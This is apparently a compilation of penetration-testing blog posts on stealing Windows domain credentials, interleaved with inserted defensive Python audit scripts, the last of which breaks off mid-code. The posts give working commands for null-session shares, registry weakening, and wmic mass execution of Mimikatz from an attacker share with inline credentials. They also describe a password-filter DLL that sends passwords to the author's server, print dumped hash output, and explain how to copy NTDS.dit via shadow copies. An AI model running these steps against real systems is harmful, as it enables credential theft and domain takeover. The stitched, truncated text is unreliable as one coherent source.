I’ve taken a rather long hiatus from blogging. This is mostly because I was fed up with the blogging platform that I had (Squarespace) and didn’t really have any alternatives that met all of the features I wanted.
So, where am I at now? GitHub, actually. GitHub allows users to create “GitHub Pages” for repositories (or as its own repo). For the most part these pages are written in Markdown. It’s late and I don’t feel like looking up who, but someone created a project called “Jekyll”, which is a Ruby-based static page generator, and then another project called “Octopress” popped up that uses Jekyll to create a static HTML blogging platform.
It’s a bit of a pain in the butt to use and learn, but once you have a few things automated it gets simpler. It also hits more of my bullet points than any other option.
Expect things to pick up pretty quickly here, but as I’m typing this I’m already thinking that promising something like that is a bad idea. We’ll see how it goes, it’s just good to be back.
clymb3r recently posted a script called “Invoke-Mimikatz.ps1”. Basically, what this does is reflectively inject Mimikatz into memory, call for all the logonPasswords, and exit. It even checks the target’s architecture (x86/x64) first and injects the correct DLL.
You can very easily use this script directly from an admin command prompt like so:
(This works REALLY well for Citrix and Kiosk scenarios and it’s too hard to type/remember)
This runs the PowerShell script by pulling it directly from GitHub and executing it “in memory” on your system.
One of the awesome added capabilities of this script is the ability to run it against a list of hosts, like so:
This works great, as all the output lands directly on your system and everything is executed through PowerShell Remoting. PowerShell Remoting runs on top of WinRM. That service, however, is not enabled by default, and how much any given enterprise uses WinRM is pretty hit or miss. It is usually the servers and more important systems that have it enabled, more often than not.
You can find WinRM / PowerShell Remoting by scanning for the service port 47001 as well as the default communication ports for WinRM, 5985 (HTTP) and 5986 (HTTPS).
If you find that your target isn’t a WinRM-rich environment, or you just want more passwords, you can take a slightly more painful route that I call “Mass Mimikatz”.
Step 1. Make a share. We are doing this so we can not only collect the output of all our computers’ passwords, but also host the CMD batch file that will run the PowerShell script:
cd\
mkdir open
net share open=C:\open /grant:everyone,full
icacls C:\open\ /grant Everyone:(OI)(CI)F /t
We are setting “Everyone” permissions on a Share (net share) and NTFS (icacls) level for this to work properly.
Step 2. Set registry keys. There are two registry keys that we need to set. The first allows Null Sessions to our new share and the second gives null users the “Everyone” token so that we don’t have to get crazy with our permissions. I have created a meterpreter script with a bunch of error checking here: massmimi_reg.rb
or you can just make the following changes:
HKLM\System\CurrentControlSet\services\LanmanServer\Parameters NullSessionShares REG_MULTI_SZ = open
HKLM\System\CurrentControlSet\Control\Lsa "EveryoneIncludesAnonymous" = 1
Step 3. Change directory into the new “open” directory. This is so our uploads and, in particular, our web server will be hosted out of the correct directory.
Step 4. Upload powermeup.cmd – this batch script will run our hosted Invoke-Mimikatz script on each host:
Step 6. Upload mongoose: Downloads Page – both the regular and tiny versions work. This is an awesome single-executable web server that supports Lua, SQLite, and WebDAV out of the box. The tiny version is under 100k.
Step 7. Upload serverlist.txt – this is a line-by-line list of computer names to use Mimikatz on. You’ll have to gather this one way or another.
Step 8. Execute mongoose (from the directory with mimikatz.ps1) – this will start a listener with directory listings enabled on port 8080 by default.
Step 9a. Execute wmic:
wmic /node:@serverlist.txt process call create "\\192.168.92.127\open\powershellme.cmd"
Step 9b. Execute wmic with creds:
wmic /node:@serverlist.txt /user:PROJECTMENTOR\jdoe /password:ASDqwe123 process call create "\\192.168.92.127\open\powershellme.cmd"
Step 10. Watch as text files full of wonder and joy fill your share.
Again, this requires a very highly privileged account, which is no fun. And I need these computer lists as part of my internal / post-exploitation recon, not as an end step.
For the longest time I relied on a very awesome tool called “Adfind”:
This command will output a list of computer accounts that have been active in the last 90 days in a straight line-by-line format (hence all of the no “this” and no “that” flags).
But that wasn’t good enough, this image kept haunting me:
It’s Active Directory Explorer by SysInternals. It shows the complete list of DNS records, stored as objects in Active Directory, that I was able to get to as a basic domain user. This means all of the static DNS records for the Unix systems, mainframes and other systems outside of the purely Windows world are there as well.
I spent 4 days attempting to write my own script, LDAP query, and prayer to get all of the data out, but was unsuccessful. On the 5th day I happened upon a very short post saying “I did it”, much as I probably would have written it myself. It comes in the form of a PowerShell script that you can find here:
If you put a -csv on the end of those, the author has even given you CSV format, which makes the output extremely easy to parse. Now you can throw your list into your tool of choice: instead of scanning random IP ranges on the target’s network for important stuff, you can scan directly against known good hosts.
— mubix
P.S. Yes, I realize this isn’t actually a “Zone Transfer”, but it’s close enough.
Password Filters [0] are a way for organizations and governments to enforce stricter password requirements on Windows accounts than those available by default in Active Directory Group Policy. It is also fairly well documented how to Install and Register Password Filters [1]. Basically, what it boils down to is updating a registry key here: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
with the name of a DLL (without the extension) that you place in Windows\System32\
For National CCDC earlier this year (2013), I created an installer and “evil pass filter” that basically installed itself as a password filter; any time a password changed it would store the change in a log file locally on the victim (in clear text) and also issue an HTTP basic-auth POST with the username and password to a server I own.
The full code can be found below. I’ll leave the compiling up to you, but basically it’s slamming the code into Visual Studio, telling it it’s a DLL, and clicking build for the architecture you are targeting (make sure to use the Internet Open access settings that make the most sense for the environment you are using this in [2]).
So let’s walk through the exploitation:
First, you have to be admin or system, as this is more of a persistence method than anything.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Next, we upload the evilpassfilter.dll to System32:
What you can’t see here since Metasploit isn’t showing the line breaks is that there are two there by default:
scecli
rassfm
We need to add ours to the end of this list. Unfortunately, at the current point in time it’s impossible to do that directly from the meterpreter command line (as far as I know), so we need to drop a .reg file and manually import it. The easiest way to do that is to add your “evilpassfilter” string, as well as the ones on the victim, to a VM you have and export it. It should look like this:
Once we have our file, we upload and import it using the reg command:
This works from Windows 2000, XP all the way up to Windows 8 & 2012.
OK, but how often are local passwords changed? Maybe not that often, but guess what happens when a password filter is put on a domain controller: every password changed by that DC is “verified” by your evil password filter.
Oh, and what does that log file we talked about earlier look like on the victim, if for some reason they block the IP you’re sending the credentials to? (You would have to find a way back onto that system, or make the file available via a share or otherwise.)
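Both of the registry changes these posts lean on (the NullSessionShares / EveryoneIncludesAnonymous values from the Mass Mimikatz setup, and the Notification Packages list that a password filter registers itself in) are exactly what a defender should be looking for. The following is an added example, not code from the posts: a small Python parser for a .reg export (the kind of file you get from reg export) that decodes REG_MULTI_SZ hex(7) data and flags the three conditions. The sample export, the DLL name evilpassfilter and the expected-package set are constructed; on a real host you would export the two keys and feed that file in.

```python
import re

# Constructed sample of a .reg export (not taken from the posts). It contains the
# three values the posts touch, with a hypothetical extra package "evilpassfilter".
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"NullSessionShares"=hex(7):6f,00,70,00,65,00,6e,00,00,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"EveryoneIncludesAnonymous"=dword:00000001
"Notification Packages"=hex(7):73,00,63,00,65,00,63,00,6c,00,69,00,00,00,72,00,\
  61,00,73,00,73,00,66,00,6d,00,00,00,65,00,76,00,69,00,6c,00,70,00,61,00,73,00,\
  73,00,66,00,69,00,6c,00,74,00,65,00,72,00,00,00,00,00
"""

LANMAN = r"hkey_local_machine\system\currentcontrolset\services\lanmanserver\parameters"
LSA = r"hkey_local_machine\system\currentcontrolset\control\lsa"

# Packages present by default according to the post; extend this from a known-good host.
EXPECTED_PACKAGES = {"scecli", "rassfm"}

VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')


def parse_reg(text):
    """Parse a .reg export into {key_path_lowercase: {value_name: (type, value)}}."""
    keys, current = {}, None
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        i += 1
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
            continue
        # hex data is wrapped with a trailing backslash; glue the pieces back together
        while line.endswith("\\") and i < len(lines):
            line = line[:-1] + lines[i].strip()
            i += 1
        m = VALUE_RE.match(line)
        if not m or current is None:
            continue
        name, raw = m.groups()
        if raw.startswith("dword:"):
            keys[current][name] = ("REG_DWORD", int(raw[len("dword:"):], 16))
        elif raw.startswith("hex(7):"):
            data = bytes(int(b, 16) for b in raw[len("hex(7):"):].split(",") if b)
            # REG_MULTI_SZ: UTF-16LE strings separated by NUL, terminated by a double NUL
            strings = data.decode("utf-16-le").split("\x00")
            keys[current][name] = ("REG_MULTI_SZ", [s for s in strings if s])
        elif raw.startswith('"') and raw.endswith('"'):
            keys[current][name] = ("REG_SZ", raw[1:-1])
    return keys


def audit_registry(keys):
    """Return human-readable findings for the settings the posts rely on."""
    findings = []
    shares = keys.get(LANMAN, {}).get("NullSessionShares", (None, []))[1]
    if shares:
        findings.append("null-session shares configured: " + ", ".join(shares))
    lsa = keys.get(LSA, {})
    if lsa.get("EveryoneIncludesAnonymous", (None, 0))[1] == 1:
        findings.append("EveryoneIncludesAnonymous=1: anonymous users receive the Everyone token")
    packages = lsa.get("Notification Packages", (None, []))[1]
    extra = [p for p in packages if p.lower() not in EXPECTED_PACKAGES]
    if extra:
        findings.append("unexpected password filter DLL(s) registered: " + ", ".join(extra))
    return findings


if __name__ == "__main__":
    for finding in audit_registry(parse_reg(SAMPLE_REG)):
        print(finding)
```

Each DLL named in Notification Packages is loaded by LSASS at boot, so anything in that list that you cannot trace back to a known product or a golden image deserves a look at the file in System32 and its signature.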
If you’ve ever used proxychains to push things through Meterpreter, one of the most annoying things is its “hardcoded” DNS setting of 4.2.2.2: if the org that you are going after doesn’t allow this out of their network, or if you are trying to resolve an internal asset, you’re SOL. After a ton of googling and annoyed head slams into walls every time I forget where this is, I’ve finally decided to make a note of it.
There isn’t much magic here other than knowing that this file exists, but /bin/proxyresolv is a shell script that calls “dig” over TCP against the DNS server specified, so the lookup itself goes through proxychains. Here is what it looks like:
(on Kali linux its found here: /usr/lib/proxychains3/proxyresolv)
#!/bin/sh
# This script is called by proxychains to resolve DNS names

# DNS server used to resolve names
DNS_SERVER=4.2.2.2

if [ $# = 0 ] ; then
	echo " usage:"
	echo " proxyresolv <hostname> "
	exit
fi

export LD_PRELOAD=libproxychains.so.3
dig $1 @$DNS_SERVER +tcp | awk '/A.+[0-9]+\.[0-9]+\.[0-9]/{print $5;}'
Now you could just make the dig request yourself through proxychains and then throw whatever you originally intended directly at an IP, or you can change DNS_SERVER and hardcode your engagement’s internal DNS IP. Up to you, but now it’s documented and I’ll never have to go searching like crazy again… as long as I remember that it’s on someone else’s blog.
ScriptJunkie quickly identified that I was using a DWORD for a Handle and using 4 bits for a 64 bit process (should be 8) as well as the fact that I could use a PDWORD with the ProcessInformation inout parameter instead of writing it to memory myself.
The problem is that everyone does this whole blogging thing in so many different ways. Me, personally? I like to have a client that I can save drafts in, work on things a little bit here and there, and then finalize stuff when I’m ready to post. I have a couple dozen of these posts ready, needing only final tweaks, but my blogging software Squarespace up and moved on to “Squarespace 6”. At the current stage you don’t have to move to 6, but at some point the owners of Squarespace are going to force everyone over. I don’t want to wait for that to happen.
Octopress and Postach.io are my favorite options right now. Both blog in markdown language which is ok. Converting 8 years of blog posts to markdown is going to be a lot of work but a one time deal. Plus it would give me a chance to go through and fix the things that were broken over the years of modified blogging clients and services.
Postach.io has one major downside: they don’t have good “code” block support, whereas Octopress/Jekyll have excellent support as well as code highlighting. The major upside? It’s based on Evernote, which means I can blog from wherever I have Evernote. They also used to have an EXCELLENT feature that seems to have disappeared: if you updated a post it would automatically throw the blog post up to the top of your page, meaning your update would get back into your RSS feed and wouldn’t go unnoticed, as most updates to blog posts do.
root@wpad:~/blog/libesedb-20120102# cd esedbtools/
root@wpad:~/blog/libesedb-20120102/esedbtools# ./esedbexport
esedbexport 20120102
Missing source file.
Use esedbexport to export items stored in an Extensible Storage Engine (ESE) Database (EDB) file

Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
                   [ -T table_name ] [ -hvV ] source

        source: the source file

        -c:     codepage of ASCII strings, options: ascii, windows-874,
                windows-932, windows-936, windows-1250, windows-1251,
                windows-1252 (default), windows-1253, windows-1254
                windows-1255, windows-1256, windows-1257 or windows-1258
        -h:     shows this help
        -l:     logs information about the exported items
        -m:     export mode, option: all, tables (default)
                'all' exports all the tables or a single specified table with indexes,
                'tables' exports all the tables or a single specified table
        -t:     specify the basename of the target directory to export to
                (default is the source filename) esedbexport will add the suffix
                .export to the basename
        -T:     exports only a specific table
        -v:     verbose output to stderr
        -V:     print version
root@wpad:~/blog/libesedb-20120102/esedbtools#
root@wpad:~/blog/libesedb-20120102/esedbtools# ./esedbexport ../../ntds.dit
esedbexport 20120102
Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.
Move the exported tables to somewhere a bit easier:
root@wpad:~/blog# cd NTDSXtract 1.0/
root@wpad:~/blog/NTDSXtract 1.0# ls
dscomputers.py dsdeletedobjects.py dsfileinformation.py dsgroups.py dstimeline.py dsusers.py framework ntds
root@wpad:~/blog/NTDSXtract 1.0# python dsusers.py
DSUsers
Extracts information related to user objects
usage: dsusers.py [option]
options:
    --rid
        List user identified by RID
    --name
        List user identified by Name
    --passwordhashes
        Extract password hashes
    --passwordhistory
        Extract password history
    --certificates
        Extract certificates
    --supplcreds
        Extract kerberos keys
    --membership
        List groups of which the user is a member
root@wpad:~/blog/NTDSXtract 1.0#
root@wpad:~/blog/NTDSXtract 1.0# python dsusers.py ../ntds.dit.export/datatable.3 ../ntds.dit.export/link_table.5 --passwordhashes ../SYSTEM.hive --passwordhistory ../SYSTEM.hive
Running with options:
Extracting password hashes
Extracting password history
Initialising engine...
Scanning database - 100% -> 3475 records processed
Extracting schema information - 100% -> 1549 records processed
Extracting object links...
List of users:
==============
Record ID: 3562
User name: Administrator
User principal name:
SAM Account name: Administrator
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 7ceee337-fa58-4ca0-9643-540a40161020
SID: S-1-5-21-3825330677-773554443-1603823854-500
When created: 2012-08-22 03:12:59
When changed: 2013-05-15 04:06:55
Account expires: Never
Password last set: 2012-08-22 02:49:42.899576
Last logon: 2013-05-15 04:08:04.547236
Last logon timestamp: 2013-05-15 04:06:55.577353
Bad password time 2013-06-07 02:34:34.560516
Logon count: 9
Bad password count: 1
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ net projectmentor Users Administrator
Password hashes:
Administrator:$NT$88e4d9fabaecf3ded18dd80905521b29:::
Password history:
Record ID: 3563
User name: Guest
User principal name:
SAM Account name: Guest
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 659723d7-1246-4959-b0fc-af80ea5e3816
SID: S-1-5-21-3825330677-773554443-1603823854-501
When created: 2012-08-22 03:12:59
When changed: 2013-03-14 06:54:22
Account expires: Never
Password last set: 2013-03-14 06:54:22.029303
Last logon: 2013-03-14 06:54:27.012817
Last logon timestamp: 2013-03-14 06:32:41.834022
Bad password time 2013-06-07 03:07:46.499917
Logon count: 0
Bad password count: 10
User Account Control:
PWD Not Required
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ net projectmentor Users Guest
Password hashes:
Guest:$NT$823893adfad2ada6e1a414f3ebdf58f7:::
Password history:
Record ID: 3564
User name: user
User principal name:
SAM Account name: user
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: c5a5c87a-93b4-4d80-97a1-1c605b9b0c03
SID: S-1-5-21-3825330677-773554443-1603823854-1000
When created: 2012-08-22 03:12:59
When changed: 2013-06-07 02:51:54
Account expires: Never
Password last set: 2013-03-14 03:25:11.793912
Last logon: 2013-06-07 02:51:54.152191
Last logon timestamp: 2013-06-07 02:51:54.152191
Bad password time 2013-04-19 05:25:40.412670
Logon count: 67
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ net projectmentor Users user
Password hashes:
user:$NT$88e4d9fabaecf3dec18dd80905521b29:::
Password history:
user_nthistory0:$NT$88e4d9fabafcf3dec18dd80905521b29:::
user_nthistory1:$NT$0c61031f010b2fbb88fe449fbf262477:::
user_nthistory2:$NT$88e4dffabaecf3dec18dd80905521b29:::
user_lmhistory0:c869027e01c3c4fe7626a90c87cc7fed:::
user_lmhistory1:8be023cd858da1edd21b94907afe182c:::
Record ID: 3610
User name: krbtgt
User principal name:
SAM Account name: krbtgt
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 74e6bd0b-e4d5-42df-98d5-24f9060061c9
SID: S-1-5-21-3825330677-773554443-1603823854-502
When created: 2012-08-22 03:16:03
When changed: 2012-08-22 03:31:13
Account expires: Never
Password last set: 2012-08-22 03:16:03.166457
Last logon: Never
Last logon timestamp: Never
Bad password time Never
Logon count: 0
Bad password count: 0
User Account Control:
Disabled
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ net projectmentor Users krbtgt
Password hashes:
krbtgt:$NT$7253e8647254716b507a2dcb149ff2da:::
Password history:
krbtgt_nthistory0:$NT$7253e86a7254716a507a2dcb149ff2da:::
krbtgt_lmhistory0:113926e06a31d182623633041b632929:::
Record ID: 3762
User name: John Doe
User principal name: jdoe@projectmentor.net
SAM Account name: jdoe
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: bbf24c63-39a9-4cc4-8aa8-933f9ddee940
SID: S-1-5-21-3825330677-773554443-1603823854-1104
When created: 2012-08-22 04:10:52
When changed: 2013-06-05 13:04:11
Account expires: Never
Password last set: 2013-04-19 07:11:49.849592
Last logon: 2013-06-07 02:56:25.677855
Last logon timestamp: 2013-06-05 13:04:11.674344
Bad password time 2013-05-02 03:01:12.536251
Logon count: 242
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ net projectmentor Users John Doe
Password hashes:
John Doe:$NT$88e4d9fabaecf3ded18dd80905511b29:::
Password history:
Record ID: 3797
User name: Random User
User principal name: randy@projectmentor.net
SAM Account name: randy
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 2701eb29-628a-4568-a093-d33a7db10d04
SID: S-1-5-21-3825330677-773554443-1603823854-1108
When created: 2013-04-08 02:34:04
When changed: 2013-05-27 16:06:07
Account expires: Never
Password last set: 2013-04-19 06:59:25.423280
Last logon: 2013-04-08 02:34:10.482690
Last logon timestamp: 2013-04-08 02:34:10.482690
Bad password time Never
Logon count: 1
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ net projectmentor Users Random User
Password hashes:
Random User:$NT$88ead9fa5aecf3dec18dd80905521b29:::
Password history:
root@wpad:~/blog/NTDSXtract 1.0#
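To make the dsusers.py output above useful beyond a hash list, here is an added example (not part of the post or of NTDSXtract) that parses that record layout and audits it the way a domain password-hygiene review would: accounts with PWD Not Required or PWD Never Expires, LM hashes retained in the history, a current hash that also appears in the account’s own history, and enabled accounts that share an NT hash. The sample dump is constructed with obviously fake 32-character hashes; the field labels follow the output shown above.

```python
import re
from collections import defaultdict

# Constructed sample in the dsusers.py layout shown above. The hashes are
# placeholder strings, not real values.
SAMPLE_DSUSERS = """\
List of users:
==============
Record ID: 3001
User name: Administrator
User principal name:
SAM Account name: Administrator
SAM Account type: SAM_NORMAL_USER_ACCOUNT
Password last set: 2012-08-22 02:49:42.899576
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ net example Users Administrator
Password hashes:
Administrator:$NT$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:::
Password history:
Record ID: 3002
User name: Guest
User principal name:
SAM Account name: Guest
SAM Account type: SAM_NORMAL_USER_ACCOUNT
User Account Control:
PWD Not Required
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ net example Users Guest
Password hashes:
Guest:$NT$bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb:::
Password history:
Record ID: 3003
User name: John Doe
User principal name: jdoe@example.net
SAM Account name: jdoe
SAM Account type: SAM_NORMAL_USER_ACCOUNT
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ net example Users John Doe
Password hashes:
John Doe:$NT$cccccccccccccccccccccccccccccccc:::
Password history:
John Doe_nthistory0:$NT$cccccccccccccccccccccccccccccccc:::
John Doe_nthistory1:$NT$dddddddddddddddddddddddddddddddd:::
John Doe_lmhistory0:eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee:::
Record ID: 3004
User name: krbtgt
User principal name:
SAM Account name: krbtgt
SAM Account type: SAM_NORMAL_USER_ACCOUNT
User Account Control:
Disabled
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ net example Users krbtgt
Password hashes:
krbtgt:$NT$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:::
Password history:
Record ID: 3005
User name: svc_backup
User principal name: svc_backup@example.net
SAM Account name: svc_backup
SAM Account type: SAM_NORMAL_USER_ACCOUNT
User Account Control:
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ net example Users svc_backup
Password hashes:
svc_backup:$NT$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:::
Password history:
"""

KV_RE = re.compile(r"^([A-Za-z ]+): ?(.*)$")            # "Label: value" lines
NT_RE = re.compile(r"^(?P<acct>[^:]+):\$NT\$(?P<hash>[0-9a-fA-F]{32}):::$")
LM_RE = re.compile(r"^(?P<acct>[^:]+):(?P<hash>[0-9a-fA-F]{32}):::$")


def parse_dsusers(text):
    """Split dsusers.py output into one dict per 'Record ID:' block."""
    users, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Record ID:"):
            cur = {"record_id": int(line.split(":", 1)[1]), "uac": [],
                   "nt_hash": None, "nt_history": [], "lm_history": []}
            users.append(cur)
            section = None
            continue
        if cur is None:
            continue
        if line == "User Account Control:":
            section = "uac"
            continue
        if line == "Ancestors:":          # ends the UAC flag list
            section = None
            continue
        if line == "Password hashes:":
            section = "hashes"
            continue
        if line == "Password history:":
            section = "history"
            continue
        if section == "uac":
            cur["uac"].append(line)
        elif section == "hashes":
            m = NT_RE.match(line)
            if m:
                cur["nt_hash"] = m.group("hash").lower()
        elif section == "history":
            m = NT_RE.match(line)
            if m:
                cur["nt_history"].append(m.group("hash").lower())
            else:
                m = LM_RE.match(line)
                if m:
                    cur["lm_history"].append(m.group("hash").lower())
        else:
            m = KV_RE.match(line)
            if m:
                cur[m.group(1).strip()] = m.group(2).strip()
    return users


def audit_users(users):
    """Password-hygiene findings over parsed records (disabled accounts are not counted for sharing)."""
    findings = []
    by_hash = defaultdict(list)
    for u in users:
        name = u.get("SAM Account name", "record %d" % u["record_id"])
        if "PWD Not Required" in u["uac"]:
            findings.append("%s: PASSWD_NOTREQD set" % name)
        if "PWD Never Expires" in u["uac"]:
            findings.append("%s: password never expires" % name)
        if u["nt_hash"] and u["nt_hash"] in u["nt_history"]:
            findings.append("%s: current password reused from history" % name)
        if u["lm_history"]:
            findings.append("%s: LM hash history present (LM hashes were being stored)" % name)
        if u["nt_hash"] and "Disabled" not in u["uac"]:
            by_hash[u["nt_hash"]].append(name)
    for names in by_hash.values():
        if len(names) > 1:
            findings.append("shared password between enabled accounts: " + ", ".join(sorted(names)))
    return findings


if __name__ == "__main__":
    for finding in audit_users(parse_dsusers(SAMPLE_DSUSERS)):
        print(finding)
```

The hash-sharing check is the one worth running first on a real dump: a service account carrying the same NT hash as a built-in administrator means one compromised password opens both.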
Ever run into a Domain Controller that wasn’t allowed to talk to the Internet, had insane AV, and had GPOs not allowing anyone to RDP in (even Domain Admins) unless they performed some kind of voodoo happy dance? Yeah, me neither, but here is how you can still dump domain hashes and hash history if you run into that case. Let’s start.
First authenticate to the domain controller and make sure you have a good working directory to use.
net use \\DC1 /user:DOMAIN\domainadminsvc domainadminsvc123
dir \\DC1\C$
Alright, let’s say “TEMP” is there and it’s empty on the remote DC. The way we are going to run commands won’t let us get results directly, so we are going to use a temp file in C:\TEMP on the DC, which we already made sure is empty.
We are going to be using Volume Shadow Copies to pull the NTDS.dit file (Active Directory’s database, much like Windows’ SAM file except that it stores the entire set of AD objects); we also need the SYSTEM registry hive. You can get the SAM registry hive as well, but that will only get you local DC credentials.
So let’s list the current volume shadow copies to see if we need to create one, from a Windows command prompt (or if you’ve installed wmic for Linux via http://www.krenger.ch/blog/wmi-commands-from-linux/ ) – this IS an interactive command, so it won’t work very nicely in a Meterpreter shell:
C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin list shadows 2>&1 > C:\temp\output.txt"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 7304;
ReturnValue = 0;
};
To break down this command:
wmic /node:DC1 – tells it to interact with the WMI API on DC1
process call create – WMI speak for create a process
cmd /c – vssadmin doesn’t operate outside of cmd for some reason…
vssadmin list shadows – List any shadow volumes that already exist
2>&1 > C:\temp\output.txt – Take STDOUT and STDERR and throw them in a text file in C:\TEMP on DC1. (Note the order matters: with 2>&1 before the > redirection, cmd sends only STDOUT to the file; write > C:\temp\output.txt 2>&1 to capture STDERR as well.) Make sure you specify the full path, because you will be executing from within C:\Windows\System32 and it’s a pain to find anything in that directory. If you just specify > bob.txt, you get to hunt for bob.txt in C:\Windows\System32 or wherever WMI decides to execute you from.
The process starts, and then you need to view the output file by either copying it down, running type \\DC1\C$\TEMP\output.txt, or mounting the C drive as a network share. Either way, you should see something like this:
C:\temp>type output.txt
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.
Contents of shadow copy set ID: {671090fd-0198}
Contained 1 shadow copies at creation time: 5/31/2013 11:29:03 AM
Shadow Copy ID: {0863e309}
Original Volume: (C:)\\?\Volume{c44da10e-0154-11e1-b968-806e6f6e6963}\
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
Originating Machine: wpad
Service Machine: wpad
Provider: 'Microsoft Software Shadow Copy provider 1.0'
Type: ClientAccessibleWriters
Attributes: Persistent, Client-accessible, No auto release, Differential, Auto recovered
or
C:\temp>type output.txt
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.
No items found that satisfy the query
If there are no shadow copies, or the ones there are too old (look at the creation time), you can create a shadow copy using the ‘vssadmin create shadow /for=C:’ command. (This command only applies to Server OSes (Win2k3/Win2k8), but since those are the only two that commonly have NTDS.dit files we don’t have to remember this):
The other thing to keep in mind is that NTDS.dit isn’t always on the main drive. It is commonly on a “D” drive for safety in case a HDD goes bad or something. But it should always be in a folder called NTDS (by default this is C:\Windows\NTDS).
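Reading creation times out of vssadmin list shadows by eye is fine for one DC. This added example (not from the post) parses the two output shapes shown above, including the “No items found that satisfy the query” case, and returns the shadow copies of a given drive that are newer than a chosen age, so you can tell at a glance whether an existing copy is recent enough or a fresh one is needed. The sample listings and their GUIDs are constructed; the date format assumes the US-English locale vssadmin was printing in above.

```python
import re
from datetime import datetime, timedelta

# Constructed listings in the shape vssadmin prints (set/copy GUIDs and times are made up).
SAMPLE_LISTING = r"""vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

Contents of shadow copy set ID: {11111111-1111-1111-1111-111111111111}
   Contained 1 shadow copies at creation time: 1/2/2013 9:15:00 PM
      Shadow Copy ID: {aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa}
         Original Volume: (C:)\\?\Volume{c44da10e-0154-11e1-b968-806e6f6e6963}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: wpad
         Service Machine: wpad
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessibleWriters
         Attributes: Persistent, Client-accessible, No auto release, Differential, Auto recovered

Contents of shadow copy set ID: {22222222-2222-2222-2222-222222222222}
   Contained 1 shadow copies at creation time: 5/31/2013 11:29:03 AM
      Shadow Copy ID: {bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb}
         Original Volume: (C:)\\?\Volume{c44da10e-0154-11e1-b968-806e6f6e6963}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
         Originating Machine: wpad
         Service Machine: wpad
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessibleWriters
         Attributes: Persistent, Client-accessible, No auto release, Differential, Auto recovered
"""

SAMPLE_EMPTY = """vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

No items found that satisfy the query
"""

# Assumption: US-English locale output, e.g. "5/31/2013 11:29:03 AM".
TIME_FORMAT = "%m/%d/%Y %I:%M:%S %p"

SET_RE = re.compile(r"Contents of shadow copy set ID: (\{[^}]+\})")
TIME_RE = re.compile(r"at creation time: (.+)$")
ID_RE = re.compile(r"Shadow Copy ID: (\{[^}]+\})")
VOL_RE = re.compile(r"Original Volume: \(([A-Za-z]):\)")
DEV_RE = re.compile(r"Shadow Copy Volume: (\S+)")


def parse_vssadmin(text):
    """Return one dict per shadow copy; an empty list for the 'No items found' output."""
    shadows, set_id, created = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "No items found that satisfy the query":
            return []
        m = SET_RE.search(line)
        if m:
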